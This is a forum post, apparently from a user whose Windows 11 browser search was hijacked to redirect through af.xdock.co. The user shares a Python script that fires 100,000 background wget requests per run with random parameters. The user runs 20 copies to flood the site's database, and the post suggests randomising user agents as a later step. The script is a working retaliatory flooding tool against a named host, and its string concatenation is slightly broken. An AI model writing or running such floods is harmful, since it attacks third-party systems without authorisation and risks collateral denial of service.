I found one of my Windows11 browsers has been hijacked, in that the default search engine was changed to "af.xdock.co" that took the supplied input, then does a HTTP 302 to Google.com and runs the query. Unless you are watcing the browser bar, its very easy to miss.

Yes, I can change the default search engine back quickly enough, though I wanted to send a message this behaviour is not OK. A few million entries in their database should get the message across.

​

The URL format is pretty easy to understand: https://af.xdock.co/?keyword={what you are searching on}&pid=int 0-999&subid=int 0-9999

Below, a quick bit of code to randomise all of this, the URL's end up looking like this: https://af.xdock.co/?keyword=KAj1ERcn3fTnugnTwGeysmkfsVeLeJampB1dd1tthdqKAtnUQyXkLEfV2KDDeazIL2JO9K3gQnsqi&pid=142&subid=1384

Note in the code, "--max-redirects 0" this is because we only want to hit the scammer, I don't want wget to follow the 302 to Google.

​

The Python3 code is as follows:

import random,string,subprocess,sys

def runcmd(cmd, verbose = False, *args, **kwargs):

process = subprocess.Popen(

cmd,

stdout = subprocess.PIPE,

stderr = subprocess.PIPE,

text = True,

shell = True

)

std_out, std_err = process.communicate()

if verbose:

print(std_out.strip(), std_err)

pass

for loop in range (100000):

command = 'wget --max-redirect 0 "https://af.xdock.co/?keyword=' ''.join(random.SystemRandom().choice(string.ascii_letters string.digits) for _ in range(random.randint(0,99))) '&pid=' str(random.randint(0,999)) '&subid=' str(random.randint(0,9999)) '" &'

print(loop,command)

runcmd(command, verbose = True)

To launch: python3 ./virus-defense-v1.py > virus-defense-v1-log-1.txt &
I have 20 threads of this running (all going to their own log files -1, -2, -3 etc).

To monitor: while :; date; do cat virus-defense-v1-log-*.txt | grep -c following | sed ':a;s/\B[0-9]\{3\}\>/,&/;ta'; sleep 10; done

Screen output looks like this:

Tue Oct 18 18:54:02 BST 2022

245,567

Tue Oct 18 18:54:13 BST 2022

245,862

​

I just left the default WGET browser string in place, a possible future enhancement might be to get samples from a large rangs of devices, then randomise the browser useragent also.